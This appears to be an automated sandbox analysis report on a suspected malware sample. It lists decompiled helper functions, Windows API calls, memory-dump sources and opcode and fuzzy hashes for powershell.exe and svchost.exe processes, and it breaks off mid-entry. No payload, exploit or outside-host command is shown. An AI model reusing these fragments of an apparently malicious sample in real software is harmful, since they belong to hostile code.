Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18

Uniqueness

Uniqueness Score: -1.00%

Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}

APIs

wcslen.MSVCRT ref: 004054EC
free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F

Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E

free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
memcpy.MSVCRT ref: 00405556

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: free$memcpy$mallocwcslen
String ID:
API String ID: 726966127-0
Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}

APIs

??2@YAPAXI@Z.MSVCRT ref: 00405B19
??2@YAPAXI@Z.MSVCRT ref: 00405B37
??2@YAPAXI@Z.MSVCRT ref: 00405B55
??2@YAPAXI@Z.MSVCRT ref: 00405B73

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exe PID: 4488 Parent PID: 7164 powershell.exeCOMMON

Executed Functions

Function 008ED006, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.921654956.00000000008ED000.00000040.00000001.sdmp, Offset: 008ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a59b3bb23167b7b25c23db2406cc84fb5f1a34cfbc0c952bf0be288f3695226e
Instruction ID: e04ab23eb1c9bfafa2b92ac6ec7b02818b5e8088f9b38c8e2a6ecd464489bd61
Opcode Fuzzy Hash: a59b3bb23167b7b25c23db2406cc84fb5f1a34cfbc0c952bf0be288f3695226e
Instruction Fuzzy Hash: 7E018C6140D7C09FD7124B268C98752BFA4EF53624F0984CBE884CF2A3C2695C48CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 008ED01D, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.921654956.00000000008ED000.00000040.00000001.sdmp, Offset: 008ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7296e6442511f51dd18f8b7de843d760727f8538088c15278d496d49d03cc6a0
Instruction ID: da6b0a8813ee747a11b879ad2ae8741862acb7602c271f03b910336e1f90059b
Opcode Fuzzy Hash: 7296e6442511f51dd18f8b7de843d760727f8538088c15278d496d49d03cc6a0
Instruction Fuzzy Hash: E301F7714087849AE7108A17CC84766BBD8FF43728F1CC05AED148B246C3799949CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: svchost.exe PID: 1284 Parent PID: 5988 svchost.exeCOMMON

Executed Functions

Function 050BC3D0, Relevance: 1.7, APIs: 1, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.959598960.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: bb88f8cc3065e464aca78c3ae4a2aa8e15fb0c4cf34dbd3fbceb3cf141e4c019
Instruction ID: 1e707cd9e0c530612556f444b23659e92c5177e6fc07647766c16db8f88e2bd6
Opcode Fuzzy Hash: bb88f8cc3065e464aca78c3ae4a2aa8e15fb0c4cf34dbd3fbceb3cf141e4c019
Instruction Fuzzy Hash: 3A714670A00B058FE764DF29E1847AAB7F2FF88214F00892DD596D7A40DBB4E945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 050BCA9C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 050BE9AA

Memory Dump Source

Source File: 00000016.00000002.959598960.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 7995cd8b7e97dfef893a4ec2601c6900af8c0f890376a303979237029e7c5e63
Instruction ID: 98df6ad485f0ff6ae5a0aaab3d4b5bd07e690244df13c10ee57510aab4b1bbbc
Opcode Fuzzy Hash: 7995cd8b7e97dfef893a4ec2601c6900af8c0f890376a303979237029e7c5e63
Instruction Fuzzy Hash: 8251BFB1D103099FDF14CF99D884ADEBBB5FF88314F24812AE819AB210D7B59945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 050BE88C, Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 050BE9AA

Memory Dump Source

Source File: 00000016.00000002.959598960.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: a42eaa449fd7950a8a4b1b259eab8c4fe68dd9b96243245fee7fef3e4ab1defa
Instruction ID: 0f605874bf5e2d95a9ef8defee4818d8d2c0529d46227f635713d9b398c859df
Opcode Fuzzy Hash: a42eaa449fd7950a8a4b1b259eab8c4fe68dd9b96243245fee7fef3e4ab1defa
Instruction Fuzzy Hash: 0E5190B1D10209DFEF14CF99D884ADEBBB5FF48314F24812AE915AB210D7B59985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 050B3758, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,050B3726,?,?,?,?,?), ref: 050B37E7

Memory Dump Source

Source File: 00000016.00000002.959598960.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: cc970eda6e91f79308be12dbc5350a98cc7d8c6e864462ddc6b5e3b68152c36f
Instruction ID: 321d779315f8e194b1da3e56a4503f6265e2a2acdd3508a8c26d99f71ba1e3ee
Opcode Fuzzy Hash: cc970eda6e91f79308be12dbc5350a98cc7d8c6e864462ddc6b5e3b68152c36f
Instruction Fuzzy Hash: 372103B5900248AFDB10CFA9D585ADEBBF8FB48320F14841AE915A3310C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 050B310C, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,050B3726,?,?,?,?,?), ref: 050B37E7

Memory Dump Source

Source File: 00000016.00000002.959598960.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4f0e7300f69d047d6bb4105466e35d18a1976bfdc972050e0db1922d52622a0b
Instruction ID: 7a344f7d8b002179825d95aaa4505e9f2ca894a6105a52fe39dc5ff09ff38db8
Opcode Fuzzy Hash: 4f0e7300f69d047d6bb4105466e35d18a1976bfdc972050e0db1922d52622a0b
Instruction Fuzzy Hash: AA21E4B590024CAFDB10CF99D585ADEBBF8FB48320F14846AE915B7310D379A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 050BB3E0, Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,050BC691,00000800,00000000,00000000), ref: 050BC8A2

Memory Dump Source

Source File: 00000016.00000002.959598960.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f03bcfa17999540d8f188509bac29703a548bd07ca1d2214d722dfa92af17c6d
Instruction ID: c2ad729634b3b25236332a33d9aa2a18a2e47b68ccdc6826a13011b6a2e836d0
Opcode Fuzzy Hash: f03bcfa17999540d8f188509bac29703a548bd07ca1d2214d722dfa92af17c6d
Instruction Fuzzy Hash: 8A216AB1C042498FDB10CFA9D484ADEBBF4FF88320F04846AE555A7200C3B5A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 050BB3F8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,050BC691,00000800,00000000,00000000), ref: 050BC8A2

Memory Dump Source

Source File: 00000016.00000002.959598960.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e60238710ab920e1c65060ebe33bd4502e9d43964cf48cd4b2d5bc685bad9c53
Instruction ID: fa07a004fcb83ca8a0df52a21adafca7ff86c031d3e0fcb720a421272ca45c98
Opcode Fuzzy Hash: e60238710ab920e1c65060ebe33bd4502e9d43964cf48cd4b2d5bc685bad9c53
Instruction Fuzzy Hash: 991117B6D042099FEB10CF9AD484ADEFBF4FB88314F04842AE915B7600C3B5A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 050BC831, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,050BC691,00000800,00000000,00000000), ref: 050BC8A2

Memory Dump Source

Source File: 00000016.00000002.959598960.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 425f36add1e0a0778fd6b386515735fc56379b7c340f907d80a1ba3ae50c5470
Instruction ID: 1d1170bcd8f9ab42edb2c58d1001b4569975676b2c2abe0f0dee631bef3992c9
Opcode Fuzzy Hash: 425f36add1e0a0778fd6b386515735fc56379b7c340f907d80a1ba3ae50c5470
Instruction Fuzzy Hash: 5C11D8B6D042499FDB10CF9AD484ADEFBF4FB49314F14842AD515A7600C375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 050B968B, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000004B), ref: 050B96FD

Memory Dump Source

Source File: 00000016.00000002.959598960.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 3d9b035ad77de532e1f2bbb7e7ab8e2237434b651b08f4ce9ca1d1ccab8ccda0
Instruction ID: 20d45aad3b83975aa1382a195dcd12302342321b25c01aac8e8a133c65b03466
Opcode Fuzzy Hash: 3d9b035ad77de532e1f2bbb7e7ab8e2237434b651b08f4ce9ca1d1ccab8ccda0
Instruction Fuzzy Hash: 8F11EE718043988FEB10CF95D6463EEBFF8EB05314F0484A9E555B7281C7789685CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 050BB3B4, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,050BC3E3), ref: 050BC616

Memory Dump Source

Source File: 00000016.00000002.959598960.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0270959466763fa97e602f0f52ca6906d6e3c9ceffcd76af7f56fce386758c18
Instruction ID: 634b158de58907ecce492dcb5506176e3dc32a88696e4260faeee6496434e52a
Opcode Fuzzy Hash: 0270959466763fa97e602f0f52ca6906d6e3c9ceffcd76af7f56fce386758c18
Instruction Fuzzy Hash: 241126B18002498FEB10CF9AD488BDEBBF4FB49210F00842AD815B7200D3B4A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 050B9698, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000004B), ref: 050B96FD

Memory Dump Source

Source File: 00000016.00000002.959598960.00000000050B0000.00000040.00000001.sdmp, Offset: 050B0000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 40cfb958fab72d1fb3a0feb71e5cf263b868a4e3d76f774fc0b37a0f3744776f
Instruction ID: a72803714b30b9f383eda17070f3ce1199c0992e6f7f279c9f830ff943ae6618
Opcode Fuzzy Hash: 40cfb958fab72d1fb3a0feb71e5cf263b868a4e3d76f774fc0b37a0f3744776f
Instruction Fuzzy Hash: B011EF718043988FEB10CF95D2853EEBFF8EB45314F008499E555B7281C7B89645CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 009FD4DC, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.919001527.00000000009FD000.00000040.00000001.sdmp, Offset: 009FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad3e3f19450432cfb14a7505bea5f4f4c8e1a31da9a392cb94939cecb199f637
Instruction ID: 6161832b6777f284d895742f66faa5151d9bdf0eaadeb08c8488f06e61fa3d7d
Opcode Fuzzy Hash: ad3e3f19450432cfb14a7505bea5f4f4c8e1a31da9a392cb94939cecb199f637
Instruction Fuzzy Hash: 2B2128B1505208DFDB04DF10D8C0B36BFA7FB88328F248569FA054B24AC336D956CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 011DD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.920986999.00000000011DD000.00000040.00000001.sdmp, Offset: 011DD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9781343009b3976f4222cbddef8738b24d48e9d85a5c5d4f395822f1046ae7e3
Instruction ID: 5e584221f310472cd3af11e13581286ccac077b946facc0b6b1c285c92fae099
Opcode Fuzzy Hash: 9781343009b3976f4222cbddef8738b24d48e9d85a5c5d4f395822f1046ae7e3
Instruction Fuzzy Hash: FB21F5B1504240DFDF19DF54E8C4B16BBA5FB88354F24C56DD9094B286C376D847CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 011DD006, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.920986999.00000000011DD000.00000040.00000001.sdmp, Offset: 011DD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b48e799a8d753aa34ca229af9002c57685cb01468a23d38033cbaee69bf4dbc0
Instruction ID: e7f44ec061f4ff5451f2f6da696bcc351e7450d97930511e42c15f6188752bc6
Opcode Fuzzy Hash: b48e799a8d753aa34ca229af9002c57685cb01468a23d38033cbaee69bf4dbc0
Instruction Fuzzy Hash: D721A1755093808FCB17CF24D994B15BF71EB86314F28C5EAD8498B697C33AD84ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 009FD4D7, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.919001527.00000000009FD000.00000040.00000001.sdmp, Offset: 009FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abf9d05837f20679d6678064280a21b40d007861ebc24b3ccb10da70a24719c3
Instruction ID: 98a4ac2de5ae4d0d919a1a61f97a06fa39ca963b3fd7a889ce3b4b92c952c58f
Opcode Fuzzy Hash: abf9d05837f20679d6678064280a21b40d007861ebc24b3ccb10da70a24719c3
Instruction Fuzzy Hash: 9E11E676504284CFCF11CF10D5C4B26BF72FB98324F28C6A9E9050B61AC336D956CBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: svchost.exe PID: 3980 Parent PID: 5552 svchost.exeCOMMON

Executed Functions

Function 013D3528, Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 013D3598
GetCurrentThread.KERNEL32 ref: 013D35D5
GetCurrentProcess.KERNEL32 ref: 013D3612
GetCurrentThreadId.KERNEL32 ref: 013D366B

Memory Dump Source

Source File: 0000001A.00000002.929452894.00000000013D0000.00000040.00000001.sdmp, Offset: 013D0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 53550c49d1b6d305d2f74d5683e580c22ef2c5bac294e258575d5763f116bda8
Instruction ID: f173162ff86b6b14b8dbbaeba34b57b9d1cc7702ef4a3267de30e82bf144bc97
Opcode Fuzzy Hash: 53550c49d1b6d305d2f74d5683e580c22ef2c5bac294e258575d5763f116bda8
Instruction Fuzzy Hash: 5B5165B99002088FDB14CFA9D588BDEBBF5FF49318F20805DE509A7350D7749948CB66

Uniqueness

Uniqueness Score: -1.00%

Function 013D3538, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 013D3598
GetCurrentThread.KERNEL32 ref: 013D35D5
GetCurrentProcess.KERNEL32 ref: 013D3612
GetCurrentThreadId.KERNEL32 ref: 013D366B

Memory Dump Source

Source File: 0000001A.00000002.929452894.00000000013D0000.00000040.00000001.sdmp, Offset: 013D0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 34471389dd11541e1fd6894db13c93e7f7a0f31121382136ee2985c1ef67fd38
Instruction ID: c287003286458466d3a7050e580af52ddd2d912f96f72b9394183d995ee22da0
Opcode Fuzzy Hash: 34471389dd11541e1fd6894db13c93e7f7a0f31121382136ee2985c1ef67fd38
Instruction Fuzzy Hash: 8B5153B99002088FDB14CFA9D588B9EBBF5FF89328F20845DE409A7350D7749948CB66

Uniqueness

Uniqueness Score: -1.00%

Function 013DC3D0, Relevance: 1.7, APIs: 1, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.929452894.00000000013D0000.00000040.00000001.sdmp, Offset: 013D0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4dd2b886a4b954a84d44e85209fa17d08aac0f2d746eccf425edc04254adc809
Instruction ID: 9cdc9a42f3898f7e73e12941deef89d7df5bd48c19c70d68524b2ef1b2d79ea8
Opcode Fuzzy Hash: 4dd2b886a4b954a84d44e85209fa17d08aac0f2d746eccf425edc04254adc809
Instruction Fuzzy Hash: 897147B1A10B098FD725DF29E55476ABBF1FF88218F00892DD58AD7A40DB74E809CF91

Uniqueness

Uniqueness Score: -1.00%

Function 013DE88C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013DE9AA

Memory Dump Source

Source File: 0000001A.00000002.929452894.00000000013D0000.00000040.00000001.sdmp, Offset: 013D0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4719699689e1314c122fbabd4e007dac4e7af1d06816487fa0a2035591ebc08c
Instruction ID: 1e588e3e2cdfe6e9408b010a1b597b9b8007588ff873e1900531aa177bbae568
Opcode Fuzzy Hash: 4719699689e1314c122fbabd4e007dac4e7af1d06816487fa0a2035591ebc08c
Instruction Fuzzy Hash: 5951C0B1D01208DFDB14CF99D884ADEBFB5FF88314F24822AE819AB210D7759845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 013DE898, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013DE9AA

Memory Dump Source

Source File: 0000001A.00000002.929452894.00000000013D0000.00000040.00000001.sdmp, Offset: 013D0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: bf8cbb9610c129114f920011ff941d416fbd1f0cde5d160e54c5b5a5ea599bf8
Instruction ID: 58e81d846ffe47e0dfe605380c193479add67802ec4ab30571836afba34bd9ec
Opcode Fuzzy Hash: bf8cbb9610c129114f920011ff941d416fbd1f0cde5d160e54c5b5a5ea599bf8
Instruction Fuzzy Hash: 2241CEB1D013099FDB14CF9AD884ADEBFB5FF88314F24822AE819AB210D7759845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 013D3758, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013D37E7

Memory Dump Source

Source File: 0000001A.00000002.929452894.00000000013D0000.00000040.00000001.sdmp, Offset: 013D0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2e1df644286cfad9943c6f69432347ddb3fee8da324e1222069d9b89acef7555
Instruction ID: 12e459f406430d853aa5f31bbbce62fe1e10a10c5ce6cec72043dbb7b875ec8f
Opcode Fuzzy Hash: 2e1df644286cfad9943c6f69432347ddb3fee8da324e1222069d9b89acef7555
Instruction Fuzzy Hash: EC21E6B69012099FDB10CF99D884ADEFBF5FB48324F14841AE914B3310D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 013D3760, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013D37E7

Memory Dump Source

Source File: 0000001A.00000002.929452894.00000000013D0000.00000040.00000001.sdmp, Offset: 013D0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 614f4ae8c6684d176bef729c173b5c55677485254117742efb9cb5be523714e2
Instruction ID: 898d82d96b31f32573c827bb16b4d4c230f2e10d1bb779680076fd90e2d3f148
Opcode Fuzzy Hash: 614f4ae8c6684d176bef729c173b5c55677485254117742efb9cb5be523714e2
Instruction Fuzzy Hash: EB21D5B59012099FDB10CF99D484ADEFBF5FB48324F14841AE914B3310D379A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 013D968A, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000004B), ref: 013D96FD

Memory Dump Source

Source File: 0000001A.00000002.929452894.00000000013D0000.00000040.00000001.sdmp, Offset: 013D0000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: ca92b2aa738dc900b6a8b0c9c3fb9820f6fb2f21a0e5b9593a87bc794bf3c89c
Instruction ID: f1356b8e509625fc8ec640d5e6fbb9a8e526165d8c21df2c876fcf070700187a
Opcode Fuzzy Hash: ca92b2aa738dc900b6a8b0c9c3fb9820f6fb2f21a0e5b9593a87bc794bf3c89c
Instruction Fuzzy Hash: A7118E768003988FDB20DF99D4447DABFF8EB05328F14405DD955B7241C779A649CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013DC831, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 013DC8A2

Memory Dump Source

Source File: 0000001A.00000002.929452894.00000000013D0000.00000040.00000001.sdmp, Offset: 013D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9c023578149cee556b4bf955875ec4ba6a984d819991c66d769ef0a19b6dc6ad
Instruction ID: 04be33c7bd8e3fdae9c544186875923431e142781e9f72192863c366e8407fdf
Opcode Fuzzy Hash: 9c023578149cee556b4bf955875ec4ba6a984d819991c66d769ef0a19b6dc6ad
Instruction Fuzzy Hash: 6A1103B6D002488FDB10CFA9D484BDEFBF5AF88324F04852ED959A7600C375A545CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 013DC838, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 013DC8A2

Memory Dump Source

Source File: 0000001A.00000002.929452894.00000000013D0000.00000040.00000001.sdmp, Offset: 013D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 960858e63a08bc34d8fc464b0528374f1b52da378444d814f8171cf4b1c98eb3
Instruction ID: c8f62d9112c5ee330666a70cd9c20ae37b6bbf2cc7e15d15e418daf33cdddff3
Opcode Fuzzy Hash: 960858e63a08bc34d8fc464b0528374f1b52da378444d814f8171cf4b1c98eb3
Instruction Fuzzy Hash: B811E2B6D002498FDB14CF9AD484ADEFBF5FB88324F14852EE929A7600C375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 013DB3B4, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,013DC3E3), ref: 013DC616

Memory Dump Source

Source File: 0000001A.00000002.929452894.00000000013D0000.00000040.00000001.sdmp, Offset: 013D0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f6aa0f651077386a53edfe390dcd3e8234b1f0c4a6ae9c3a6f519629d02b9f32
Instruction ID: c8b49243b077ccac3571f8389087c18ebdab4591bc714d99041b2e44c7dfb4d5
